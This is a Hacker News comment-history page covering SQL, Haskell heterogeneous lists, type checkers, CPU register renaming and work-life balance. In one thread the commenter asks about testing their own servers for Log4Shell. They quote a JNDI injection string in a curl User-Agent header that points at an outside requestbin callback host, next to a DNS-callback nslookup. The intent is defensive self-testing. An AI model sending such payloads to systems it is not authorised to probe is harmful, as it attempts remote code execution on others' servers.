Hacker Newsnew | past | comments | ask | show | jobs | submit | philh's commentslogin

I don't necessarily disagree. But I do think there's something to be said for knowing that my sql query is "just" slow, not trapped in an infinite loop. Not confident, but I feel like debugging "why is this query so slow that it hasn't returned yet" seems easier than debugging "why has this slow-or-maybe-nonterminating query not returned yet".


Yeah, if your table sources are small enouguh it will probably be fast enough to analyze anyway.


I think my position is:

Native heterogeneous lists will often be convenient, and sometimes when you've used them they're going to turn out in retrospect to have been a bad idea but sometimes they'll be just fine, especially if they stay fairly locally scoped. I haven't done any serious work in a language that supports them for years, so I don't have a strong opinion about how often each of those cases happens.

But if you decide you want heterogeneous lists, but your language doesn't support them, so you try to implement that with a sum type, then that's basically always going to be a massive pain.


What's an example use case where heterogeneous lists turn out to be fine but can't be modelled with eg the OCaml difflist technique, eg https://github.com/yawaramin/re-web/blob/0d6c62fb432f85cc437... ?


I'm not familiar with that technique and don't know what's going on from that snippet.

In Haskell, any time a heterogeneous list turns out to be fine, I expect to be able to model it. Often it'll look like "I'm applying a polymorphic function to every one of these list elements", and then you can either do a sum type (as discussed in the post) or an existential (which doesn't need you to list up front all the types you might use). If the function is "is negative?", it'll look something like (untested)

    data SomeNum = forall a. Num a => SomeNum a

    isNegative :: SomeNum -> Bool
    isNegative (SomeNum n) = n < 0

    numbers = [SomeNum (3 :: Int), SomeNum (5.2 :: Double), SomeNum valOfUnexpectedNumericType]
    anyNegative = any isNegative numbers
...but it'll often be easier to just apply the `< 0` check to every element before putting them in the list. (If you have several functions you want to apply to them all, that's when the existential trick becomes more useful.)

So you can model heterogeneous lists in this case, and it's safer (because you can't put in a value that can't be compared to 0) but also less convenient. Whether that's an improvement or not will depend on the situation.


I also just learned about it. I found this explanation of what it is: https://drup.github.io/2016/08/02/difflists/

It's a slightly confusing name, though; it makes me think of a difference list, which seems to be a completely unrelated data structure (basically a rope).

http://h2.jaguarpaw.co.uk/posts/demystifying-dlist/


Thanks. Yeah, I don't understand the name.

You could construct a basically-equivalent data structure in Haskell, but I think normally you'd use an HList (defined in many places but e.g. https://hackage.haskell.org/package/HList-0.5.2.0/docs/Data-...). I've only occasionally had use for them myself, at any rate I don't think they're convenient for the "apply a function to all these elements" case.


In the technique I showed, I am using a difflist to enumerate a set of HTTP POST form fields and their expected types. This difflist type is defined in such a way that one of its type parameters gets inferred as a function type which takes the decoded values in the correct order and returns a record containing the decoded form. Eg from Field.[int "id"; string "name"] we get a type parameter int -> string -> 'a, where 'a is the type of the final decoded form.

This is the kind of real-world usage where difflists or heterogeneous lists shine. The same technique is used by this library to define type-safe GraphQL resolvers: https://github.com/andreas/ocaml-graphql-server


> I haven't done any serious work in a language that supports them for years

Is this not silently admitting that strong types to some degree have won?

Don't get me wrong: I like Clojure/LISPs/Ruby. But I would not choose them for a new project these days.

(and I do not like JS, which has them too)


I'm still working at the same company as when I wrote this, and that company is still using Haskell (now mostly Typescript instead of Elm). If I did move on I'd ideally want to keep using Haskell, or failing that some other strongly typed language.

But I don't expect that my own experience says much about the language ecosystem in general. I don't particularly have an opinion on whether or not strong types have "won", and I didn't intend to comment on that question.


I would definitely choose a Lisp if it had an Intellij-like IDE. Especially since the type system of CL is good, though not static, obviously. But it's a tradeoff between having Haskell during compile time and CL during development time, for me.


For whatever it's worth, when I first wrote this I submitted it to /r/haskell (https://www.reddit.com/r/haskell/comments/cs7jyu/a_reckless_...) and it doesn't look like there were any corrections from that; and since then I've implemented an HM type checker and don't remember finding anything that made me think "oh, I was wrong about ...".

So I'm more confident in the essay than I was at the time. But yeah, getting put on guard by those caveats doesn't seem ideal for intro material. (But if I hadn't had them and I'd gotten something wrong, that would also not have been ideal...)

For writing the type checker, "write you a haskell" that someone else linked was really helpful, and so was a paper called "typing haskell in haskell": https://web.cecs.pdx.edu/~mpj/thih/thih.pdf


SQL queries sometimes put floats in GROUP BY. E.g. if you have a many-to-one relationship you might do a query like

    SELECT foo_id, foo.some_float, SUM(bar.some_thing)
    FROM foo JOIN bar USING (foo_id)
    GROUP BY foo_id, foo.some_float
I feel kinda dirty whenever I do this.

Though, I would guess the optimizer (at least in postgres) is smart enough to ensure no float equality checks actually happen under-the-hood. They could be necessary, if the schema was different than I'm imagining; but maybe in that case, it would almost always be a bad idea.


Why would you feel dirty? In this case it is solving for exact equality, ie the same bits, it doesn't matter that the value is a float.

Though I have seen some people using a double as a primary key (no idea why) and some database engine (internal, not major vendor) failing to do equality comparisons in certain statements, I suspect because they must be switching to "close enough" which is not what you expect when you write col1 = col2.


This is also really kind of an artifact of how GROUP BY works in most database engines.

I've always liked the way MySQL/MariaDB let you omit things from the GROUP BY if they're provably unique in each group (here, if foo_id is a primary key of foo, and you're grouping by it, there can only ever be one foo.some_float for each foo_id).

I suspect in practice this would get rid of approximately all occurrences of group-by-float.


Huh, I remember xearth. It would move the stars every time it redrew itself. I wanted to have it update every second for some reason, and that was distracting, so I patched it to add an option to not do that. Then I couldn't find a maintainer to send it to, so I didn't share it.


I se up xearth to approximate the view from the ISS, at the appropriate orbital velocity. But with a decent refresh rate, what a CPU hog it was.


I don't really know what's going on here, so to clarify... it gives "simple checking example"

    nslookup mydatahere.a54c4d391bad1b48ebc3.d.requestbin.net
but when I run that in my terminal I get the response

    ;; Got SERVFAIL reply from 83.146.21.6, trying next server
    Server:  212.158.248.6
    Address: 212.158.248.6#53

    ** server can't find mydatahere.a54c4d391bad1b48ebc3.d.requestbin.net: SERVFAIL
And nothing shows up in "received data" on the website.

Is that expected? Should I be running the dnsbinclient.py they provide? (I don't have the websocket module installed right now.) I did run `curl a54c4d391bad1b48ebc3.d.requestbin.net` before the nslookup, could that have made a difference here?


I'm not Requestbin's creator so I don't know. A simple nslookup or curl does work for me, with my system's DNS servers set to Cloudflare (1.1.1.1) or Google (8.8.8.8)

It looks like Vodafone (I assume this is your ISP) DNS servers aren't properly resolving the name for some reason. You could try bypassing it with dig, and directly ask a different DNS server to resolve it:

  dig @1.1.1.1 A whatever.a54c4d391bad1b48ebc3.d.requestbin.net


Thanks! Yeah, `dig` with no DNS gives me a SERVFAIL but `dig @1.1.1.1` works.

My ISP isn't Vodafone directly (I take it you think that because 83.146.21.6 belongs to them?) but might be a Vodafone reseller or something.


Yeah, I assumed since you were querying their DNS that you were a client, but makes sense it might be repackaged to other ISPs.


Like, my understanding from reading the thread was that I'd be able to run this and make requests to my servers setting my User-Agent, like

    curl -A '${jndi:ldap:test.a54c4d391bad1b48ebc3.d.requestbin.net/abc}' https://my-service.net
and if they're vulnerable (at least through logging user-agents, I know there are other possible avenues) something would show up on the website. Is it more complicated than that?


The context was parsing, not semantics. "Typeless" meant "lacking type annotations", not directly to do with static/dynamic or weak/strong typing.

(Though Python does have optional type annotations these days.)


Author in the old thread (https://news.ycombinator.com/item?id=19262249) says

> An x86-64 CPU has sixteen integer registers, but 100-200 physical integer registers. Every time an instruction writes to, say, RAX the renamer chooses an available physical register and does the write to it, recording the fact that RAX is now physical-register #137. This allows the breaking of dependency chains, thus allowing execution parallelism.

I'm curious why they have so many more physical registers than... logical? registers. I have a couple of guesses:

* Physical registers are physically cheaper to add than logical registers.

* Adding logical registers breaks backwards compatibility, or at best means you get no speedup on things written (/compiled) for fewer logical registers. Adding physical registers lets you improve performance without recompiling.

* Adding logical registers increases complexity for people writing assembly and/or compilers. Adding physical registers moves that complexity to people designing CPUs.

Are some of these correct? Other reasons I'm missing?


Don't think of %eax as a real register. Think of it as a tag in a compressed dataflow graph. The compression is performed by the compiler's register allocator, and the decompression is performed by the CPU's register renaming.

A compiler's IR is a directed graph, where nodes are instructions and tagged by an assigned register. It would be pleasant to assign each node a distinct register, but then machine instructions would be unacceptably large. So the compiler's register allocator compresses the graph, by finding nodes that do not interfere and assigning them the same register.

The CPU's register renamer then reinflates this graph, by inspecting the dataflow between instructions. If two instructions share a register tag, but the second instruction has no dependence on the first, then they may be assigned different physical registers.

`xor eax, eax` has no dependence on any instruction, so it can be specially recognized as allocating a new physical register. In this way of thinking, `xor eax, eax` doesn't zero anything, but is like malloc: it produces a fresh place to read/write, that doesn't alias anything else.


Adding more logical registers is compatibility breaking. And, since you have to encode the register specifier in the instruction it means larger instructions (hence the compatibility breaking) which makes reading and decoding instructions slower.

And, regardless of how many logical registers you have you need to have more physical registers. These are needed for out-of-order (OOO) execution and speculative execution. An OOO super-scalar speculative CPU can have hundreds of instructions in flight and these instructions all need physical registers to work on. If you don't have excess physical registers you can't do OOO or speculative execution.


Adding more logical registers doesn't have to break application compatibility. Intel added x87, MMX ... extensions with their new register sets all without breaking compatibility. They even doubled the integer register set in x86_64 with the REX prefix. New programs could use these features and their register sets without existing programs being broken.

What register renaming allows is to increase the performance of both new and existing programs, which is no mean feat. It allows the CPU scheduler to search for more out-of-order parallelism rather than relying on the compiler to find in-order parallelism.

This binary compatibility doesn't seem very important now, don't break userspace excepted, but it was then. Compatibility made IBM and Intel hundreds of billions of dollars.


Adding those registers each time at the bare minimum broke OS compatibility in order to enable them, and required kernel changes to save and restore the new architectural registers. Adding to the physical register file allows existing code (including kernel space) to take advantage of it. There's been some extensions lately like xsave that try to address that, but they're not fully embraced by major kernels AFAIK.


Tomasulo's register renaming algorithm (1967) comes from an era when you bought the computer and the operating system together. So OS compatibility was their problem. That's not our era but the resulting in-order vs out-of-order war is long over.

Register renaming enabled out-of-order execution. The 90s were a competition between in-order compiler based scheduling and out-of-order CPUs. The in-order proponents said that out-of-order was too power hungry, too complex and wouldn't scale. Well, it did. Even the Itanium which was the great in-order hope, its last microarchitecture, Poulson, had out-of-order execution.

Ultimately, out-of-order won the war but in-order survives for low power low complexity designs; the A53 is in-order. Skylake Server has 180 physical registers with an out-of-order search window of 224.

https://www.primeline-solutions.com/media/wysiwyg/news-press...


In the 1960s, os compat was your problem as the end user too. There wasn't the strict divide between OS code and user code in the same way. The 360/91 that Tomasulo's algorithm originally shipped on didn't even have an MMU to separate your code from the kernel.

Additionally, compiler tech wasn't anywhere near where it was today, and high perf code was written in ASM. Therefore existing code would have to be rewritten to use more registers, but the 360/91 ran existing code just fine (which was very important for the 360/91's main customers).


x87 and MMX's register encodings exist in (mostly) separate parts of the x86 operand encoding map. That's in contrast to GPRs, which have to squeeze into 3 (sometimes 4, with the REX prefix) bits.

That's where the incompatibility comes from -- x86-64 required an entirely new prefix to merely double the GPRs; adding a few hundred more would require some very substantial changes to the opcode map and all decoders already out there.


When x87+MMX were added, existing programs ran unchanged. When x86-64 doubled the register sets, many existing programs ran unchanged (some features were dropped). Compatibility was largely maintained. That compatibility was what AMD wagged in Intel's face when Intel was trying to pivot to Itanium. Intel had to then take the walk of shame and adopt AMD's approach.

Seriously, Intel took a long view towards this. x87 was a wart on the side of mole and still its unholy marriage with MMX (they shared a register set) allowed existing programs to run while creating a compatibility barrier to competitors. Competitors had to be compatible and bug compatible. The guy tasked with doing this at Transmeta almost had a nervous breakdown, not from compatibility (easy) but from bug compatibility.

IBM 360 programs still run on the Z architecture.


The original 8087 prompted the IEE-754 floating point standard, which had a profound impact on the entire field of computer science.

https://news.ycombinator.com/item?id=17767925

https://news.ycombinator.com/item?id=23205225

https://news.ycombinator.com/item?id=23362673

https://news.ycombinator.com/item?id=18107165


I'm not saying it's impossible! They certainly have plenty of space in the EVEX scheme. But extending the GPRs is a much bigger lift, tooling-wise, than is adding a relatively disjoint ISA extension. Even if they can do it while preserving older encodings, it's just another speedbump at a time when Intel is probably anxious to make x86-64 as frictionless as possible.

Besides, register renaming seems to be working splendidly at the uarch level. Why complicate the architectural model when the gains are already present?


> Even if they can do it while preserving older encodings, it's just another speedbump at a time when Intel is probably anxious to make x86-64 as frictionless as possible.

Just wanted to throw out there that it was AMD that came up with x86-64's ISA rather than Intel. Intel was still pushing Itanium hard at the time.


x87 instructions weren't dropped, they are still available on x86_64.


Yeah, you're right. 64-Bit Mode Valid Thanks.


> I'm curious why they have so many more physical registers than... logical? registers

Register renaming allows instructions to be executed out-of-order [1] which allows for more instruction throughput.

This goes back to 1967 and to the IBM 360/91 with its 4 floating point registers. That's not many registers but Moore's law was making more transistors available. The problem was how to use these transistors to get more throughput from existing programs without changing the ISA and (potentially) breaking compatibility.

The solution was Tomasulo's algorithm [2] which allowed (few) architectural registers to be renamed to (many) physical registers.

  original         renamed           reordered
  mov RAX, 1       mov PHYS1, 1      mov PHYS1, 1; mov RAX, [RCX]
  add RBX, RAX     add RBX, PHYS1    add RBX, PHYS1
  mov RAX, [RCX]   mov RAX, [RCX]
The first and third instructions can be executed at the same time on independent functional units. The third is out-of-order with respect to the second.

[1] https://inst.eecs.berkeley.edu/~cs152/sp20/lectures/L10-Comp...

[2] https://en.wikipedia.org/wiki/Tomasulo_algorithm


I've not seen this in other responses, but an answer to your question is every logical register adds overhead to context switching by the operating system.

The OS has to store and load all registers whenever it decides to switch which thread is processing. 100 more logical registers means 100 more locations the OS has to keep track of.

This is part of the reason why new SIMD instruction sets need OS support before you can start using them.


> Adding logical registers breaks backwards compatibility

This, plus adding logical registers increases instruction size and therefore decreases the number of instructions that can be fetched with a given memory bandwidth.


It can definitely be beneficial to add logical registers. When AMD designed x86-64 they doubled the number of general logical registers up to 16. As other commenters have said, unless you are already making breaking changes, increasing the number of logical registers is probably not worth it.


Having more physical registers than logical means the CPU can do optimizations, opcodes don't have to be as big (it takes more bits to encode more registers), compatibility with older binary code is maintained, and CPUs at different price points can have different numbers of physical registers while all being able to run the same binaries.

(I don't know if any manufacturer actually does that last thing, however.)


> * Adding logical registers breaks backwards compatibility, or at best means you get no speedup on things written (/compiled) for fewer logical registers. Adding physical registers lets you improve performance without recompiling.

> * Adding logical registers increases complexity for people writing assembly and/or compilers. Adding physical registers moves that complexity to people designing CPUs.

These two points are the same thing: compatibility and compatibility is what Intel and AMD have lived on from day one with x86. It's why we still live with this really weird instruction set with all of its historical oddities. Certain features of real mode weren't removed until long into the 64-bit era. Adding things isn't any better: If you wanted to add more add more registers, you'd have to change instruction encoding and the instruction space is finite (actually limited to 15 bytes.) That would be rather disruptive.


I think your second point hits it and is the primary benefit to hiding the microarchitecture layer - it can be improved and existing code will benefit from it.

Basically Intel is saying if you had 200 GPRs, you couldn't do better at using the free ones than the CPU scheduler/decoder.

> Adding *architecturally visible* registers increases complexity for people writing assembly and/or compilers.

More registers just makes your code less likely to have to shuffle stuff to and back from RAM - which is where stuff will go if you don't have registers.

It's always faster for a CPU to access registers within itself than have to talk over a bus to a memory. Even when RAM was the same speed as CPUs (8-bit era) you would still save a cycle or two.


Having more logical/architectural registers is great except for a few costs:

1) More bits to encode register numbers in instructions. Doubling the number of logical registers costs another two or three bits depending on how many registers are referenced in an instruction

2) Logical registers have to be saved on context switches

3) Logical registers have to be saved around function calls. Either the caller or the callee has to save (or not use) registers, and most functions are both callers and callees. That is, if you are not a leaf-node function then every register you use you have to first save to the stack, or else assume that the functions you call will trash it. Thus, more registers have diminishing returns.

4) No matter how many logical registers you have you _always_ want to have an order of magnitude more physical registers, because otherwise you can't implement OOO or speculative execution.

Point #4 is probably the most critical because I think what people are really asking is why are there more physical than logical registers, and OOO/speculative execution is the answer.


I wonder how things like register renaming (or pipelining) are implemented. It would seem difficult even in a high level language, but they do it inside the processor. Is this in microcode that runs on the "actual" processor? Or is it in hardware? Do they write th algorithm in a language like VHDL or Verilog?


Register renaming is implemented in hardware. Because it is used on every instruction it is on the critical path and is probably hand-optimized. Here is some more reading on this topic:

https://en.wikipedia.org/wiki/Register_renaming


Renaming isn't really done in microcode. Microcode is just another source for ops that get renamed. All of the renaming happens in hardware, and boils down to a handful of tables inside the processor.


Some cores are open source and you can see for yourself.

Rename logic from BOOM, a RISC-V core written in a DSL embedded in Scala:

https://github.com/riscv-boom/riscv-boom/blob/1ef2bc6f6c98e5...

From RSD, a core designed for FPGAs written in SystemVerilog:

https://github.com/rsd-devel/rsd/blob/master/Processor/Src/R...

And then there's Alibaba's recently open-sourced XuanTie C910, which contains this Verilog… which is completely unreadable. Seems like it was produced by some kind of code generator that they didn't open-source?

https://github.com/T-head-Semi/openc910/blob/d4a3b947ec9bb8f...


All of the above, I believe.


Beyond reasons & limitations explained in sibling posts, having large number of (logical / instruction-level) registers also inflates instruction size, and thus diminishes instruction density, and thus lowers performance - so there is a trade-off between that and large number of registers. Hear me out.

The CPU has limited memory bandwidth; the larger instruction size, the more bytes needs to be loaded from memory to execute the instruction. Same with cache size - the more space an instruction takes, the lower the amount of instructions that is cached. Lastly, there's the complexity & latency of the instruction decoder. This possible performance loss is averted by keeping instructions short and instruction set "dense".

Any instruction that refers to a register needs certain amount of bits in the operand portion to indicate which specific register(s) is to be used [1][2][3]. As example, in case of 8-register x86 the operand generally uses 3 bits just to indicate which register to use. In case of 16 register x86_64, it takes 4 bits. If we wanted to use all 200 physical register, that would require whole 8 bits reserved in the instruction just to indicate the register to use. Certain instructions - data transfer, algebra & bitwise operations, comparisons, etc. - naturally use two or more registers, so multiply that accordingly.

Since using this many registers gives only diminishing return in terms of performance (and also requires very heavy lifting on compiler's part[4]), the trade-off selected is that the compiler uses architecture-defined small number of registers, and the processor at runtime is able to speed up some code using the spare registers for instruction-level execution parallelism.

[Edit]

There's one more common circumstance where large number of registers is undesirable: a change of execution context (thread switch; process switch; interrupt). Typically all architecturally-visible registers are saved to memory on a change of context and new set is loaded for the new context. The more registers there are, the more work is to be done. Since the hardware registers are managed directly by CPU and serve as more of cache than directly accessed register, they don't need to be stored to memory.

[1] Aside of certain specialized instructions that implicitly use a particular register; for example in x86 many instructions implicitly use the FLAGS register; DIV/IDIV integer division implicitly uses AX and DX registers.

[2] Aside of certain instruction prefixes that influence which register is used; for example in x86 that would be segment register overrides.

[3] Aside of certain architectures where registers were organized in a "file" and available only through a "window" - i.e., an implicit context, implicit register addressing base; instruction operands referred to registers relative to the current window, and the whole window could be shifted by specialized instructions. Typically shifted on function enter/leave and similar. This was more-or-less the whole "hardware registers" being exposed at architecture level, however in a somewhat constrained / instruction-dense way.

[4] Arranging which registers to use, which to spill to memory etc. is non-trivial work for compiler, and the complexity grows super-linearly with the number of registers.


the ISA defines logical registers

the implementation defines physical registers

any implementation is permissible as long as it conforms to the ISA


This doesn't acknowledge weekends, which if you have the same 8 hours sleep and 4 hours "not for yourself", add more than 50% to the time you supposedly have "for yourself". (4×5 + 12×2 vs 4×7.)

Which doesn't necessarily change the point, but I'm not sure what if anything the point is supposed to be, and it seems an important omission.


Don't usually have much extra time on the weekends. Weekends are for making up for a week of the house getting dirty, relatives and friends wanting to meet, extra long walks for the dogs that only got short walks during the week, errands that got put off, some catchup sleep, actually relaxing a bit since there wasn't much during the week, etc.

I might have 2-3 hours each day (of energy and motivation) to work on projects but not 8. Of course I never have 4 hours during the week either, I'm lucky to get 1 in usually.


> relatives and friends wanting to meet

which is why some people who have the discipline and self-control to do a big personal project often have to neglect friends and family - it's a sacrifice.


Sure. I'm not saying I haven't made sacrifices for personal projects before, especially when I was younger, but I'm also not willing to become a total hermit and slave for these projects that are not really going anywhere.

Hell, I'm still waiting on my first board game signed by a publisher four years ago to be manufactured and released, and it sounds like it's still on the backburner at their company (they had a rough two years from the pandemic, I get it). And I've had another game be a finalist in two game design competitions since then and still not find a publisher willing to take a chance on it (several other finalists in the same competitions have). And I've pitched at least a dozen of my other designs to quite a few publishers as well.

Still churning and pitching but after seven years of trying and not getting anywhere, it's rough. I know if I went full time I'd have a lot more success (especially seeing how much success a friend of mine is having in only about 3 years of being full-time at it), but I'm not willing to start working for 30% of my current salary or possibly a lot less just to throw a few more board games into the field that's already supersaturated from the past decade of constant new and quality releases, especially when most publishers are facing an existential threat from the current shipping crisis.

I'm also working on a couple of smaller video games, but there are weeks where it just seems like I'm too busy or tired to spend time on it. And it's hard to go "yes, let's make the sacrifice of not seeing friends and ignoring my family" when I'm really not seeing how I'm going to break through the flood of video games out there either. I'm not an artist, I'm not going to make the next Stardew Valley or Undertale by myself. I'm making games with hexes and arrows in them :) Fun games, and one of them was even a popular free flash game back in the day and also won awards, but most people have probably moved on now and the new generation won't have any nostalgia for it.

Still feel like I need to make it anyway though.


youre not alone. Unless i actively maintain my apartment itll deteriorate over the week (i even meal prep weekends to alleviate some) i do agree with others though. More time spent disengaging from the work your doing may actually net you a positive in the productivity dept


Weekends aren't necessarily free time.

Saturdays and Sundays are chore days, or family days, or simply resting, or ...

About 4h remaining for yourself is still fairly realistic.


I assume that for most people the "not for yourself" time is bigger on the weekends, it is for me and the people around me.


Indeed. In my case, ever since I became a parent, I consider weekends a total write-off.


What do you mean by "that's really on you"? I'd normally interpret it as something like... "this is a state of affairs that would be different if you'd acted differently, and you knew or could have been able to know this in advance". Along those lines, anyway. But not having heard about a tool doesn't really seem to fit that.


>What do you mean by "that's really on you"?

At some point, a tool is so ubiquitous that it's just odd to not have encountered it. You don't see many accountants that haven't heard of Excel, webdevs that haven't heard of Apache, construction workers that haven't heard of a hammer, or cybersec workers who haven't heard of L0phtCrack.


It means it's their fault because they clearly were not paying attention or their memory has failed them.

L0phtCrack has been decreasingly relevant in the past 10 years or so -- it wasn't available for awhile and some free tools are similar so you were basically buying the rainbow tables -- but if you were in security in the Windows 2000 or Windows XP era, you know of this tool. There was a lot of discussion for years around and about password crackers after rainbow tables became a thing.

It's not like not knowing what Wireshark or nmap is, but it is like saying that you've never even heard of Kismet or John the Ripper. Or like being a DBA for decades that never heard of Informix. Or a programmer for "decades" that has never even heard of Delphi. Like what were you doing in the early 2000s to have completely missed the death of Borland and Pascal and the popular variants? These are big enough events in the industry that if you're in it you're going to be aware of it.


Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: